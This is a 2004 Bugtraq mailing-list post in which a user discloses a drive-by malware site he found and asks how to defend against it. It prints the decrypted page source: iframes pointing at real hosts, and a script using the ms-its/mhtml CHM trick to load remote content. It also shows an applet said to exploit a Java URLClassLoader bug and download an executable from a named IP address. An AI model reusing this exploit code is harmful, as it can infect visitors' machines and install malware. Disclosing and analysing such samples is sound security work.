[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Strange Java Loader
From: duffbeer <duffbeer () gmx ! net>
Date: 2004-12-30 6:34:23
Message-ID: 116798078.20041230073423 () gmx ! net
[Download RAW message or body]
Hi People,
before reading this,
dont go on any of the sites
unless you are sure ;)
after decrypting some stuff, this is the source from:
http://xxl-size.com/cogo.html
-------------------------------------
<iframe src="http://209.8.20.130/dl/adv346.php">
<iframe src="http://www.awmcash.biz/adverts/14/1.htm">
-------------------------------------
this is the source from one of the iframes
(http://209.8.20.130/dl/adv346.php):
----------------------------------------------------
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'ms-its:mhtml:file://c:\\nosuch.mht!http://209.8.20.130/dl/adv346/x.chm::/x.htm'));
</script>
<applet width=1 height=1 ARCHIVE=loaderadv346.jar \
code=Counter></APPLET></body></html>
----------------------------------------------------
the jar archive loaderadv346.jar contains some java classes
which exploits the URLClassLoader bug (BlackBox.class).
it overrides the sandbox and downloads a loadadv346.exe from:
http://209.8.20.130/dl/loadadv346.exe
this seems to be a dialer or something like this,
it changes the hosts file, creates some spawn files,
you can look for yourself, i included the file
and the java stuff, the loadadv is upx'd,
so far, anyone knows how to protect from this crap?
you're welcome to send some solutions ;)
cya, Stefan
["loaderadv.zip" (application/x-zip-compressed)]
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic